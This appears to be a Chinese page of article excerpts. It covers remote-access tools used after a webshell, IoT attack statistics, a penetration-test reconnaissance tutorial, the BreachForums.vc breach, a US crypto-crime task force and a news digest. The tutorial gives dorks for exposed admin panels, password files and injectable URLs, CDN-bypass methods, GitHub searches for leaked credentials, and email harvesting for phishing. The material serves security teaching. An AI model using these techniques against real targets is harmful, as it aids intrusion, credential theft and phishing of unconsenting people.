（2）启动anydesk的权限需要桌面用户权限，比如，IIS做了中间件环境，拿到的webshell一般都是没有桌面用户权限，如果启动anydesk是不会成功的。 gotohttp gotohttp在我的渗透测试过程中，是一个常见的方式，给我的感觉，即用即连，浏览器连接，方便快捷。但是缺点就是权限划分明确，普通用户权限起的gotohttp无法进行管理员权限操作，比如关闭windows defender和其他一些行为，不过在规避杀软这儿也有奇效。 复现过程 普通用户上去之后只能用普通用户权限（这里下载对应的gotohttp https://gotohttp.com/），上传上去，命令行运行他，直接在当前目录下生成配置文件，读取配置文件，即可成功连接 因为是普通用户启动的，这里如果尝试关闭windows defender，是无法进行点击的。 ...

物联网设备的安全性存在设计上的“先天缺陷”且长期使用默认密码，极容易遭到黑客攻击。此外，随着OT网络中分配给高级物联网传感器的角色和身份迅速增加，这些与关键任务系统紧密关联的物联网设备正在成为黑客最青睐的高价值目标。 根据Forrester的最新报告《2023 年物联网安全状况》，物联网设备正在成为黑客攻击的头号载体和目标。 物联网攻击增速明显快于主流漏洞 卡巴斯基ICS CERT发现，在2022年下半年，工业领域计算机中有34.3%受到攻击影响，仅2021年上半年，针对物联网设备的攻击就高达15亿次。超过40%的OT系统曾阻止过恶意对象。SonicWall Capture Labs的威胁研究人员在2022年记录了1.123亿个物联网恶意软件实例，比2021年增长了87%。 资料来源：Forrester，2023年物联网安全状况   Airgap Networks首席执行官Ritesh Agrawal观察到，虽然物联网端点可能不是业务关键组件，但它们很容易被入侵成为恶意软件载体，殃及企业最有价值的系统和数据。他建议企业加强物联网端点安全的三个基本功：资产发现、微分段和身份管理。 物联网成为高价值目标的四大原因   物联网设备受到攻击不仅是因为它们容易攻击，而且往往是高价值目标。很多行业的物联网设备运行着关键任务，因此受害者更容易支付赎金。攻击者知道，任何工厂都无法承受长期停机的后果，因此勒索软件组织向制造企业索要的赎金金额是其他行业目标的两到四倍。调查显示，61%的攻击尝试和23%的勒索软件攻击主要针对OT系统。 Forrester调查了物联网设备为何成为如此高价值的目标，以及它们如何被用来对组织发起更广泛、更具破坏性的攻击。报告发现四个关键因素如下： 1.物联网设备的设计存在安全盲点。 大多数遗留的、当前安装的物联网设备在设计时并未将安全性作为优先事项。许多人缺乏重新刷新固件或加载新软件代理的选项。尽管有这些局限，仍然有保护物联网端点的有效方法。 第一个目标必须是消除物联网传感器和网络中的盲点。CrowdStrike物联网安全产品管理总监Shivan Mandalam在最近的一次采访中指出：“企业必须消除与不受管理或不受支持的遗留系统相关的盲点。通过提高IT和OT系统的可见性和分析能力，安全团队可以在对手利用问题之前快速识别和解决问题。” 目前北美市场的主要物联网安全系统和平台厂商包括AirGap Networks、Absolute Software、Armis、Broadcom、Cisco、CradlePoint、CrowdStrike、Entrust、Forescout、Fortinet、Ivanti、JFrog和Rapid7。去年在Falcon 2022上，CrowdStrike推出了增强型Falcon Insight，包括Falcon Insight XDR和Falcon Discover for IoT，后者针对工业控制系统(ICS)内部和之间的安全漏洞。 企业网络安全优先级调查统计数据  资料来源：Forrester，2023年物联网安全状况 Forrester的2022年调查数据显示，63%的全球高级安全决策者决定在2023年增加物联网安全预算，这表现为端点安全已经成为企业安全预算的最高优先级（上图）。 2.长期使用管理员密码（包括凭据）很常见。 人手不足的制造企业在物联网传感器上使用默认管理员密码极为常见。他们通常使用默认设置，因为制造企业的IT团队没有时间为每个传感器进行安全设置，或者压根不知道可以这么做。Forrester指出，这是因为许多物联网设备在初始化时不要求用户设置新密码。Forrester还指出，管理凭据在旧设备中通常无法更改。 因此，CISO、安全团队、风险管理专业人员和IT团队在其网络上拥有大量可用已知凭据访问的新旧设备。 提供基于身份的物联网安全解决方案的供应商有很多，例如Armis、Broadcom、Cisco、CradlePoint、CrowdStrike、Entrust、Forescout、Fortinet、Ivanti和JFrog。Ivanti是该领域的领导者，已成功开发并推出四种物联网安全解决方案：用于RBVM的Ivanti Neurons、用于UEM的Ivanti Neurons、用于医疗行业的Ivanti Neurons，它支持医疗物联网(IoMT)，以及Ivanti Neurons for IIoT（收购自Wavelink），用于保护工业物联网(IIoT)网络。 “根据IBM的数据，物联网设备正成为黑客的热门目标。2021年，物联网攻击占全球恶意软件攻击的12%以上，远高于2019年的1%，”Ivanti首席产品官Srinivas Mukkamala博士解释道：“为了解决这个问题，企业必须实施统一的端点管理(UEM)解决方案，该解决方案可以发现组织网络上的所有资产——甚至包括是休息室中支持Wi-Fi联网的烤面包机。” “UEM和基于风险的漏洞管理解决方案的结合对于实现无缝、主动的风险响应以修复组织环境中所有设备和操作系统上被积极利用的漏洞至关重要。”Mukkamala强调 3.几乎所有医疗、服务和制造企业都依赖传统的物联网传感 从医院科室和病房到车间，传统的物联网传感器是这些企业获取运营所需实时数据的支柱。同时这两个行业又都是高价值目标，攻击者首先会攻击其物联网网络以启动跨网络的横向移动。73%的联网IV泵是可破解的，50%的IP语音(VoIP)系统也是如此；总体而言，如今一家典型医院中50%的联网设备都存在严重风先险 Forrester指出，造成这些漏洞的主要原因之一是设备运行着失去技术支持的老旧操作系统，无法保护或更新这些操作系统。如果攻击者入侵了设备并且无法修补，会增加设备“变砖”的风险。 4.IoT的问题是I，而不是T。 物联网设备一旦接入互联网就存在安全风险。一位匿名网安全供应商透露，他们的一个制造业大客户发现有人从外部频繁扫描其内部一个IP地址。 调查发现该IP地址属于该企业大堂的安全摄像头，攻击者正在监控（员工）流量模式，研究如何从上班的员工人流中混入企业，然后物理访问内部网络并将恶意传感器植入网络。Forrester的调查显示，物联网设备已成为黑客命令和控制攻击的管道，或者成为僵尸网络的一部分，例如众所周知的Marai僵尸网络。 物联网攻击的真实案例 制造业企业普遍反映，他们不确定如何保护传统物联网设备及其可编程逻辑控制器(PLC)。PLC提供了运行其业务所需的丰富的实时数据流。IoT和PLC的设计目的是为了易于集成，而不是安全性，这使得任何没有全职网络安全人员的制造企业难以应对。 一家位于美国中西部的汽车零部件制造商遭到过大规模勒索软件攻击，该攻击始于其网络上未受保护的物联网传感器和摄像头遭到破坏。攻击者使用R4IoT勒索软件的变体初始渗透到该公司用于自动化HVAC、电力和设备预防性维护的物联网、视频系统和PLC组件中。 进入公司网络后，攻击者横向移动并用勒索软件感染了所有基于Windows的系统。攻击者还获得了管理员权限并禁用了Windows防火墙和第三方防火墙，然后通过网络将R4IoT可执行文件安装到机器上。 这次攻击导致该制造企业无法监控机器的热量、压力、运行状况和循环时间。勒索软件还冻结并加密了所有数据文件，使它们无法使用。更糟糕的是，攻击者威胁说，如果不支付赎金，他们将在24小时内将受害企业的所有定价、客户和生产数据发布到暗网上。 该制造商别无选择，只能支付赎金，因为其所在地区的网络安全人才并不知道如何应对攻击。攻击者也知道，成千上万的制造企业没有专业的网络安全团队来应对这种威胁，也不知道如何应对。这导致制造业成为物联网攻击受灾最严重的行业。而物联网设备成为黑客首选威胁载体的原因也很简单，因为它们没有受到保护。...

一.搜索引擎 由于传统的信息收集方法如端口扫描、目录扫描等会在服务器上留下大量的日志痕迹，在某些情况下还可能被安全设备拦截，因此能否在不惊动目标服务器的情况下，对目标网站收集尽可能多的信息呢？GoogleHacking，也叫Google Dorking，是一种利用谷歌搜索和其他搜索引擎来发现网站配置和计算机代码中的安全漏洞的计算机黑客技术。 搜索引擎可以完成端口扫描，目录扫描，C段，旁站等信息收集，所以将搜索引擎放在第一个来讲 1.Google hacking site：限制搜索范围为某一网站，例如：site:baidu.com "admin" 可以搜索 baidu.com 网站上包含关键词“admin”的页面。 inurl：限制关键字出现在网址的某个部分，例如：inurl:php?id= 可以搜索网址中包含 php?id=的页面。   intitle：限制关键字出现在页面标题中，例如：intitle:index of / 定位网站目录索引页面。   filetype：限制搜索特定文件类型，例如：filetype:pdf   site:example.com 可以搜索 example.com 网站上的 pdf 文件。   cache：查看 Google 对某个页面的快照，例如：cache:example.com 查看   Google 对 example.com 的快照。   案例语句 1.查找暴露在互联网的后台资产 intile:后台登录 inurl:login|admin|manage|member|admin_login|login_admin|s ystem|login|user|main|cms 2.搜索xxx.com的子域名信息 site:xiusafe.com 3.搜索互联网上的登录入口 intitle:登录 site:baidu.com intitle:登录 site:baidu.com -zhidao.baidu.com -baike. baidu.com -jingyan.baidu.com 4.查找互联网敏感文件 filetype:mdb|doc|xlsx|pdf 密码 filetype:xls 5.sql注入 inurl:php?id= site:tw 更多资料 https://ght.se7ensec.cn/# https://github.com/K0rz3n/GoogleHacking-Page   2.物联网搜索引擎 1).Shodan Shodan是一个知名的物联网搜索引擎，我们可以利用Shodan搜索和互联网关联的服务器、摄像头、打印机、路由器等设备。下表展示了Shodan关键词及说明。 实用案例演示 1.查找位于中国（.cn）的Nginx服务器： nginx country:cn 2.搜索位于南京的开放3389端口的服务器： port:3389 city:Nanjing 3.搜索位于中国南京且暴露在互联网上的海康威视摄像头： Hikvision-Webs country:cn city:Nanjing 4.查看全球的Cisco思科设备情况： isp:cisco 5.查看全球的华为设备情况： isp:huawei 2).ZoomEye ye中文名为“钟馗之眼”，它定位于网络空间搜索引擎，能对暴露在公网的主机设备及网站组件进行全方位搜索（只要有IP地址即可搜索到），发现其中的漏洞。ZoomEye和Shodan的区别是，ZoomEye目前侧重于Web层面的资产发现，而Shodan则侧重于主机层面的资产发现。 关键词 组件名称： app:组件名 ver:组件版本 端口： port:开放端口 操作系统： os:操作系统 服务： service:分析结果中的“服务名”字段 主机名： hostname:分析结果中的“主机名”字段 位置： country:国家或者地区代码 city:城市名称 IP地址： ip:搜索一个指定的IP地址 网站： site:网站域名 标题： title:页面标题 关键词： keywords:<meta name="Keywords"> 定义的页面关键词 描述： desc:<meta name="description"> 定义的页面说明 HTTP头： headers:HTTP 请求中的 Headers 3).FOFA FOFA是白帽汇公司推出的一款网络空间资产搜索引擎。它能够帮助企业客户迅速进行网络资产匹配、加快后续工作进程。例如，进行漏洞影响范围分析、应用分布统计、应用流行度排名统计等操作。 基本查询语法 我们直接输入查询语句，从标题、HTML内容、HTTP头信息、URL字段中进行搜索： title="abc" 从标题中搜索abc header="abc" 从HTTP头中搜索abc body="abc" 从HTML正文中搜索abc domain="qq.com" 搜索根域名带有qq.com的网站 host=".gov.cn" 从URL中搜索.gov.cn port="443" 查找对应443端口的资产 ip="1.1.1.1" 搜索IP地址的信息 protocol="https" 搜索制定 协议类型(在开启端口扫描的情况下有效) city="Beijing" 搜索指定城市的资产 region="Zhejiang" 搜索指定行政区的资产 country="CN" 搜索指定国家(编码)的资产 cert="google" 搜索证书(https或者imaps等)中带有google的资产banner=users && protocol=ftp 搜索FTP协议中带有users文本的资产type=service 搜索所有协议资产，支持subdomain和service两种 os=windows 搜索Windows资产 server=="Microsoft-IIS/7.5" 搜索IIS 7.5服务器 app="海康威视-视频监控" 搜索海康威视设备 after="2017" && before="2017-10-01" 时间范围段搜索org="Amazon.com, Inc." 搜索指定org(组织)的资产 base_protocol="udp" 搜索指定udp协议的资 二.域名信息收集 1.whois查询 域名的 whois 信息可以提供以下作用： 确认域名的所有者、注册商、注册日期和到期日期等基本信息。 了解域名的注册历史，对于判断一个域名的可信度和信誉程度有很大帮助。 判断一个域名是否正在被使用及其使用方式，是否涉及到滥用、欺诈等问题。 可以通过 whois 信息获得自己的域名信息，及时检查域名是否即将到期，避免域名失效带来的影响 站长之家 https://whois.chinaz.com/ viewdns https://viewdns.info/ 2.备案信息查询 只要使用国内的服务器搭建网站都必须进行网站备案才可以进行正常访问，这是我国的一项管理要求，主要是为了防止不法分子在网上从事非法的宣传或经营活动，打击不良互联网信息的传播。所以针对搭建在国内的网站也可以进行备案信息查询。 备案信息 资产收集 ● 站长之家 https://icp.chinaz.com   ● 天眼查 https://www.tianyancha.com/   ● 企查查   ● 爱企查   ● ICP 备案查询网 http://www.beianbeian.com/   ● 爱站备案查询 https://icp.aizhan.com/   ● 域名助手备案信息查询 http://cha.fute.com/inde   3.子域名信息收集 一般在渗透测试前会先对目标的子域名资产进行收集，收集可以利用互联网上的第三方接口，也可以直接使用字典进行子域名“爆破”。 (1) 在线字典爆破工具 目前互联网上存在一些在线子域名爆破工具，使用起来也比较方便，唯一的缺点就是字典和爆破速度不够强大，用户不能自定义字典，不过优点是具有匿名性，可以防止被溯源。 (2)本地字典爆破工具 除了可以使用一些在线爆破工具，还可以使用一些本地的子域名爆破工具，部分工具可以灵活地加载本地的字典来进行爆破。比较常用的本地子域名爆破工具有：SubDomainsBrute、LayerDomainFinder子域名挖掘机 (3)API子域名查询接口 除了手动使用这些API接口来进行查询，也可以使用集成了API的工具来进行一键查询，比较有名的项目就是 OneForAll，这是一款功能强大的子域名收集工具，核心代码利用的是各种第三方的接口，所以在查询数量上比较有优势。 三. 服务器信息收集 随着网络的发展，很多网站都开始使用CDN，CDN分发网络将源站的内容发布到接近用户的网络“边缘”，用户可以就近获取所需数据，不仅降低了网络的拥塞状况、提高了请求的响应速度，也能够减少源站的负载压力。在加速网站访问的同时也让渗透测试人员难以获取真实的服务器IP地址，所以CDN的判断和绕过是服务器信息收集的第一步，只有绕过了CDN才可以拿到服务器的真实IP信息。 域名—>IP 1.CDN判断方法 ping命令 直接使用 ping 命令有时候也可以查询到目标网站是否使用了CDN。 有时，可以直接看到waf、cdn等字样的域名，这就表示目标服务器使用了CDN。不过有很多厂商可能只让www主站域名使用CDN，空域名或者子域名并没有使用CDN缓存，所以这种情况下直接使用ping xxx.com 就有可能得到真实的IP地址。 2.nslookup查询 不仅可以使用 ping 命令来对目标网站进行CDN判断，也可以使用nslookup命令查询域名的解析情况，如果一个域名解析结果为多个IP地址，那么多半使用了CDN 。 2.绕过CDN找到真实IP的8种方法 正常情况下，通过cmd命令可以快速找到域名对应IP，最常见的命令如ping、nslookup。但很多站点出于用户体验和安全的角度，使用CDN加速，将域名解析到CDN，这时候就需要绕过CDN来查找真实IP。 一、DNS历史解析记录 查询域名的历史解析记录，可能会找到网站使用CDN前的解析记录，从而获取真实ip，相关查询的网站有： iphistory：https://viewdns.info/iphistory/ DNS查询：（https://dnsdb.io/zh-cn/） 微步在线：（https://x.threatbook.cn/） 域名查询：（https://site.ip138.com/） DNS历史查询：（https://securitytrails.com/） Netcraft：https://sitereport.netcraft.com/?url=github.com IP History 查询记录： 二、查找子域名 很多时候，一些重要的站点会做CDN，而一些子域名站点并没有加入CDN，而且跟主站在同一个C段内，这时候，就可以通过查找子域名来查找网站的真实IP。 常用的子域名查找方法和工具： 1、搜索引擎查询：如Google、baidu、Bing等传统搜索引擎，site:http://baidu.cominurl:http://baidu.com，搜target.com|公司名字。 2、一些在线查询工具，如： http://tool.chinaz.com/subdomain/ http://i.links.cn/subdomain/     http://subdomain.chaxun.la/ http://searchdns.netcraft.com/ https://www.virustotal.com/ 3、 子域名暴力猜解 子域名暴力工具： Layer子域名挖掘机 wydomain：https://github.com/ring04h/wydomain     subDomainsBrute:https://github.com/lijiejie/ Sublist3r:https://github.com/aboul3la/Sublist3r 三、网站邮件头信息 比如说，邮箱注册，邮箱找回密码、RSS邮件订阅等功能场景，通过网站给自己发送邮件，从而让目标主动暴露他们的真实的IP，查看邮件头信息，获取到网站的真实IP。 四、网络空间安全引擎搜索 通过关键字或网站域名，就可以找出被收录的IP，很多时候获取到的就是网站的真实IP。 1、钟馗之眼：https://www.zoomeye.org 2、Shodan：https://www.shodan.io 3、Fofa：https://fofa.so ZoomEy搜索： 五、利用SSL证书寻找真实IP 证书颁发机构(CA)必须将他们发布的每个SSL/TLS证书发布到公共日志中，SSL/TLS证书通常包含域名、子域名和电子邮件地址。因此SSL/TLS证书成为了攻击者的切入点。 SSL证书搜索引擎： https://censys.io/ipv4?q=github.com 六、国外主机解析域名 大部分 CDN 厂商因为各种原因只做了国内的线路，而针对国外的线路可能几乎没有，此时我们使用国外的DNS查询，很可能获取到真实IP。 国外多PING测试工具： https://asm.ca.com/zh_cn/ping.php http://host-tracker.com/ http://www.webpagetest.org/ https://dnscheck.pingdom.com/ 国外多ping网站测试： 七、扫描全网 通过Zmap、masscan等工具对整个互联网发起扫描，针对扫描结果进行关键字查找，获取网站真实IP。 1、ZMap号称是最快的互联网扫描工具，能够在45分钟扫遍全网。 https://github.com/zmap/zmap 2、Masscan号称是最快的互联网端口扫描器，最快可以在六分钟内扫遍互联网。 https://github.com/robertdavidgraham/masscan 八、配置不当导致绕过 在配置CDN的时候，需要指定域名、端口等信息，有时候小小的配置细节就容易导致CDN防护被绕过。 案例1：为了方便用户访问，我们常常将www.test.com和test.com解析到同一个站点，而CDN只配置了www.test.com，通过访问test.com，就可以绕过 CDN 了。 案例2：站点同时支持http和https访问，CDN只配置 https协议，那么这时访问http就可以轻易绕过。 3.端口信息探测 端口信息探测是指对目标服务器资产进行开放端口号的穷举扫描，以了解某台计算机的弱点，并了解其提供的计算机网络服务类型。一般在渗透测试中常使用Nmap工具对目标网站进行端口扫描，Nmap的英文全称是“Network Mapper”，中文翻译过来就是“网络映射器”。Nmap是一款开源的端口扫描神器，它可以快速地扫描大型网络，也可以扫描单个主机。 1）渗透测试中的常见端口 端口如同一个房间的门，这个房间有多少个门呢？有65536个之多，也就是说端口的取值范围是0～65535个。本地操作系统会给那些有需求的进程分配协议端口，每个协议端口均有一个正整数标识，如80、139、445等，一般在渗透测试中，我们需要关注如表3-3所示的常见端口及协议。 这些端口可能存在对应的漏洞，这样就可以通过端口入侵到目标服务器中。 2）Nmap简单扫描 -sS：进行 TCP SYN（半开放式）扫描。这是一种常用的扫描方式，通过发送 TCP SYN包，判断目标主机的端口是否开放。 -sT：进行 TCP 连接扫描。这种扫描方式也是基于 TCP，通过建立 TCP 连接，判断目标主机的端口是否开放。 -sU：进行 UDP 扫描。UDP 是一种无连接的协议，因此不能像 TCP 一样建立连接来确定目标主机的端口是否开放。这种扫描方式需要发送 UDP 数据包，通过响应的数据包 判断端口是否开放。 -O：进行操作系统信息探测。通过使用不同的特征扫描目标主机，判断其使用的操作 系统。 -p：指定端口扫描范围。可以指定端口范围、单个端口或多个离散的端口。 -A：激活“操作系统指纹识别”、“版本检测”、“脚本扫描”等高级扫描选项。 -sV：进行服务版本检测。这种扫描方式可以探测出目标主机运行的具体服务以及其版 本号。 -T：设置扫描速度。可以设置不同的速度等级，以适应不同的扫描环境。速度级别从 0 到 5，级别越高，扫描速度越快，但也越容易被防火墙拦截 从扫描结果可以看出192.168.239.135目标服务器开放着21、23、135、445、3389、49152等端口，在Nmap进行端口扫描的时候，其会把扫描到的端口信息反馈回来，我们从反馈回来的信息就可以判断目标端口情况，具体状态含义可以参考下表返回状态及说明所示 3） Zenmap使用 4）脚本使用 如果没有Nmap工具，也可以使用最原始的脚本发起Ping请求。 4.操作系统类型探测 1）使用TTL值进行系统探测 不同的操作系统默认的TTL（Time To Live）值是不同的，因此通过Ping命令返回的TTL值加上 traceroute 获得的跳转节点数就能算出目标节点设置的TTL数，从而推测出目标节点的操作系统类型。比如，我们要探测10.20.24.244的操作系统类型，具体可以参照如下步骤进行操作。操作系统类型探测如下图所示 从中可以看到，从本地到目标主机一共经过了1-1=0跳，然后尝试直接Ping这个IP地址，测试目标主机连通性如图所示 Ping 返回的TTL为64，最后加上之前的0跳，所以目标主机的最终TTL值为：64+0=64，这表明目标主机是一台Linux操作系统的主机。操作系统和TTL对应关系如表所示 2） 使用Nmap进行系统探测 Nmap不仅是一款端口扫描工具，还可以对主机的服务及版本进行识别和探测。使用-O参数即可启用操作系统类型检测。Nmap操作系统类型探测如图所示 3）搜索引擎 四.Web信息收集 1.Web指纹识别 指纹识别是指网站CMS（Content Management System）内容管理系统的探测、计算机操作系统及Web 容器的指纹识别等。应用程序一般在HTML、JS、CSS等文件中包含一些特征码，这些特征码就是所谓的指纹。当碰到其他网站也存在此特征时，就可以快速识别出该程序，所以叫作指纹识别。 1) 文件内容匹配 WordPress是全球比较流行的一个WebCMS，它是由PHP语言编写的，在WordPress搭建的网站中就可以找到WordPress相关的字样信息。WordPress指纹如图所示(F12键)。 2)第三方插件 Firefox 插件 Wappalyzer 3)在线网站 CMS 漏洞 https://github.com/s7ckTeam/Glass https://github.com/EdgeSecurityTeam/EHole   定位版本对应已知漏洞检查   CMS 未知漏洞挖掘   显示网站使用的技术   https://whatcms.org/   https://builtwith.com/   2.敏感目录扫描 渗透测试中常常会对目标网站进行目录扫描，通过穷举字典的方法对目标进行目录探测，一些安全性脆弱的网站往往会被扫描出如管理员后台、网站备份文件、文件上传页面或者其他重要的文件信息，攻击者可以直接将这些敏感信息下载到本地来进行查看。 网站的三种部署模式 1.主域名与子域名的方式 a.com 1.a.com 2.目录 a.com a.com/admin/ 3.端口 a.com a.com:8080 所以对Web目录进行探测在渗透测试中是非常重要的一步，这有助于让我们对资产进行更深入的了解。渗透测试中对目标网站进行目录扫描的方法有很多，不过原理无外乎就是字典穷举，与其找一个好用的扫描工具，不如把重点放在如何构建自己的目录字典上。 Web目录扫描工具较多，列举下述几个 1）Dirsearch Dirsearch是一个使用Python编写的Web目录扫描工具，其自带的字典也比较强大，字典数目有6000多个，Dirsearch扫描的效率也很高，虽然字典的数量庞大，但是扫描完一个站点往往连一分钟都不到，下图就是使用Dirsearch来扫描靶机的效果。 2）御剑 3）gobuster 3.旁站信息收集 旁站指的是目标域名IP下的其他网站信息，可以使用一些在线工具来进行旁站查询。 1）爱站IP反查域名（ https://icp.aizhan.com/） 2）站长之家（https://icp.chinaz.com） 3）FOFA ip="121.196.37.183" && type="subdomain" 4.C段信息收集 C段信息收集指的是探测目标服务器局域网段下的其他资产信息，在早期主机运营商防护不够的时候，往往拿下C段的资产就可以对C段下的其他资产进行ARP嗅探劫持。 1).FOFA ip="121.196.37.1/24" && type="subdomain 2)工具-webfinder 五.其他信息收集 1.GitHub信息收集 我们可以使用前面学到的谷歌搜索语法来查找GitHub上面的敏感信息，如： password @163.com site:github.com 但是这样搜索的结果并不是很全面，所以最好的方式是使用GitHub自带的搜索，在左上角输入框内填写关键词，然后切换到如图所示的GitHub信息收集页面。 常见搜索的关键词如下： Linux密码 mysql数据库 password smtp password mysql password ssh password dbpass dbname 关键词这一块很灵活，读者朋友们可以根据自己的实际需求来自由发挥。 2.邮箱信息收集 在渗透测试过程中，收集邮箱也是不可缺少的一步，黑客收集邮箱后可以方便对这些邮箱进行定向“钓鱼”攻击。除了使用钓鱼攻击，还可以使用收集到的邮箱来爆破邮箱系统或者其他的登录系统。那么如何来收集互联网上的邮箱信息呢？最简单的方法就是直接使用搜索引擎来搜索，可以使用如下关键词查找到互联网上的邮箱信息： mail @xxxx.com 可供选择的搜索引擎有很多，百度、搜狗、谷歌、必应、雅虎、领英等都是不错的搜索邮箱的工具，当然也有一些小工具集成了这些功能，如7kbscan编写的EmailSniper邮箱据介绍就是一个不错的工具。EmailSniper执行样例如图所示。 3.社交 QQ、weibo、支付宝、脉脉、咸鱼、短视频、人人、贴吧、论坛 外网信息，推特、ins、fb 等 4.注册过的网站 https://www.reg007.com/ 5.默认密码 https://default-password.info/ http://routerpasswords.com 6.网页缓存 http://www.cachedpages.com/ 7.邮箱钓鱼 Email http://24mail.chacuo.net/enus  ...

BreachForums.vc在臭名昭著的ShinyHunters黑客的控制下卷土重来，这些黑客与原BreachForums的管理团队进行合作。 在旧的BreachForums论坛被联邦调查局查封之后，其所有者PomPomPurin（真名：Conor Brian Fitzpatrick）在纽约被捕，后来，因为担心数据被FBI掌握，继任管理员Baphomet宣布关闭旧的BreachForums论坛。 现在，新恢复的论坛已成为数据泄露的受害者，导致4202多名注册会员的个人信息暴露。 OnniForums的管理员宣布入侵了BreachForums.vc 在Telegram上的一次交流中，一位名为“Weep”（The Jacuzzi聊天的版主之一）的网友证实了网络攻击的发生。Weep向BreachForums.vc的成员发表讲话，并将数据泄露归因于名为OnniForums的竞争对手论坛，该论坛是一个专注于安全和匿名的暗网论坛。Weep敦促论坛成员重置密码，并透露黑客利用了MyBB论坛程序的0day漏洞。 与此同时，据称来自OnniForums官方推特账户的推文声称对这次袭击负责。来自同一论坛的另一条推文声称他们参与了破坏另一个名为“Exposed”的黑客论坛。值得注意的是，2022年5月，ExposedForum上泄露了一个部分数据库，其中包含来自现已被FBI查封的RaidForums的46万多名成员的详细信息。 泄露的数据包括4202名注册会员的信息 经多位用户确认，泄露数据是真实的，包括4202名注册会员的信息。 泄露的信息包括以下内容：登录密钥、用户名、电子邮件地址、IP地址、密码哈希、注册日期、成员的上次访问和帖子、帖子数和上次活动、社交媒体、个人资料链接等等。 BreachForums曾因促进被盗数据的讨论和交易而臭名昭著，该论坛重新启动后再次成为网络安全问题的焦点。 BreachForums.vc论坛现已恢复访问 BreachForums.vc自2023年6月19日星期一凌晨以来一直处于离线状态，但目前，该论坛已恢复在线。新的公告透露，数据泄露是由竞争对手的黑客论坛实施的，该论坛利用了免费开源论坛软件MyBB中的0day漏洞。 公告介绍，BreachForums.vc仍处于论坛的早期阶段，他们已经必须每天7*24处理来自竞争对手的DDOS攻击。同一个人在服务器上发现了MyBB的备份，其中包含约4000的电子邮件、密码（使用argon2i进行哈希处理）和IP（主要是VPN/Tor）。 公告表示，目前无法确定现在有多少人可以访问用户数据库。为了以防万一，请用户重设密码。并称，有些人担心论坛会消失，但他们不会，他们正在为这个错误承担全部责任，并将确保生存下去。...

美国政府成立了一个新的打击加密货币犯罪的特别工作组，由来自不同联邦机构的五名调查员组成。 “暗网市场和数字货币犯罪特别工作组”成立于6月15日，旨在“瓦解和摧毁“那些利用数字货币提供的“匿名外观”进行贩毒、洗钱和其他犯罪的犯罪组织。 其活动暂时将仅限于亚利桑那州。 美国移民和海关执法局网站周二分享的一份新闻稿称：“随着这些犯罪活动和组织变得更加复杂，执法工具、资源和情报必须适应，不得不进行调整。” > U.S. Attorney and Federal Law Enforcement Partners Announce Formalization of Darknet Marketplace and Digital Currency Crimes Task Force [@DHSgov](https://twitter.com/DHSgov?ref_src=twsrc%5Etfw) [@DEAPHOENIXDiv](https://twitter.com/DEAPHOENIXDiv?ref_src=twsrc%5Etfw) [@IRS\_CI](https://twitter.com/IRS_CI?ref_src=twsrc%5Etfw) [@USPISpressroom](https://twitter.com/USPISpressroom?ref_src=twsrc%5Etfw) > > — US Attorney Arizona (@USAO\_AZ) [June 16, 2023](https://twitter.com/USAO_AZ/status/1669760960167387136?ref_src=twsrc%5Etfw) 该交叉机构包括来自国土安全部（DHS）、国税局刑事调查组（IRS-CI）、美国缉毒署（DEA）、司法部（DOJ）和美国邮政检查局（USPS）的特工。 多年来，这五个机构都完成了一系列与加密货币有关的刑事调查，加密货币作为绕过传统金融体系制衡的工具，正在不断增长。 例如，去年，司法部追回了2018年从加密货币交易所Bitfinex盗窃的36亿美元比特币，这是历史上最大的一次金融扣押行动。同年晚些时候，该部门查获了与丝绸之路（Silk Road）相关的50,000个比特币(BTC)，”丝绸之路“是一个现已不复存在的暗网市场，利用比特币促进毒品、武器和其他非法物品的交易。 “DEA致力于拯救生命，”DEA负责的特别探员Cheri Oz说。“隐藏在暗网中的毒贩将被这个特别工作组积极锁定并揭穿。” 与此同时，IRS-CI特别负责人Al Childress表示，他的部门“正在越来越多地投入更多的调查时间和特工专业知识来应对暗网和加密货币犯罪。” 根据Chainaanalysis的数据，虽然通过加密货币相关犯罪窃取的资金数额每年都在增长，但其在加密货币相关交易绝对总额中所占的份额持续下降。 此外，美国财政部去年在一份风险评估报告中证实，数字资产被用于洗钱的情况仍然远少于法定货币。 尽管如此，财政部还在4月份强调了与去中心化金融（DeFi）生态系统相关的“国家安全”风险，因为“窃贼”和“勒索软件行为者”也可以利用它来洗钱。...

6月24日，农历五月初七，星期六 在这里，每天60秒读懂世界 1、多地陆续公布2023高考分数线：吉林一本文科485、理科463。宁夏一本文科488、理科397。江西一本文科533、理科518。云南一本文科530、理科485。内蒙古一本文科468、理科434。上海本科录取控制分数线405分； 2、中国驻美国使领馆：对受疫情影响暂时失去入境功能的10年多次签证给予补偿； 3、22日，辽宁营口市一钢铁企业发生烫伤事故致4死5伤，专家组初步认定系设备故障所致，两年前曾因转炉喷爆致2死1伤； 4、23日凌晨，辽宁庄河市蓉花山镇一男子因家庭琐事将哥哥一家六口杀害，警方：嫌疑人已被捉获； 5、23日中午，河南新密市新华路办事处东大街一处门面房因液化气泄漏引发爆炸，致房屋坍塌，4人受伤；北京：集中开展对餐饮等非居民用户的燃气安全检查，存燃气安全隐患拒不整改将暂停供气或限制购气； 6、深圳：已收到1635件个人破产申请，原因包括借钱炒股、经营不善等； 7、美国3M公司涉嫌污染公共供水系统，将赔偿高达740亿元：涉及灭火泡沫中的PFAS化学物质，极难降解，进血液会长久积存； 8、沙特正式宣布：退出2030年世界杯申办工作。目前剩下西班牙-葡萄牙-摩洛哥三国联办和乌拉圭-阿根廷-巴拉圭-智利四国联办这两个候选方案； 9、外媒：也门过去两天遭暴雨袭击，已致12人死亡8人失踪8人受伤；美欧科学家：外星人可能正利用超新星爆炸引起人类注意； 10、莫迪在美国放出豪言：印度很快将是世界第三大经济体！去年GDP增长6.7%，已超英国成世界第五； 11、印尼总统：印尼决定取消对159个国家及地区的免签政策，仅另外9个东盟成员国和东帝汶的旅客可继续免签政策； 12、韩媒：韩国越南商定建立稀土类等关键矿物供应链合作体系，并正式开展碳减排量跨境交易合作； 13、美国海岸警卫队确认：泰坦号深潜器发生了灾难性内爆，5名乘员全部死亡，完全毁灭只在1/20秒内； 14、西方官员称乌反攻早期"低于预期"，乌官员：主要反攻还没开始，秋冬再看成果。俄防长：将在6月底完成预备役部队组建工作； 15、越南公安部：美国恐怖组织成员奉命渗透到越南，策划多乐省警局袭击，已有47人被捕；美国"里根"号航母将于25日下午停靠越南港口，停留至6月30日，越方称"正常友好交流"； 【微语】有付出，才有回报，这是亘古不变的真理，莫贪便宜，一定要非常坚信天下没有免费的午餐。...

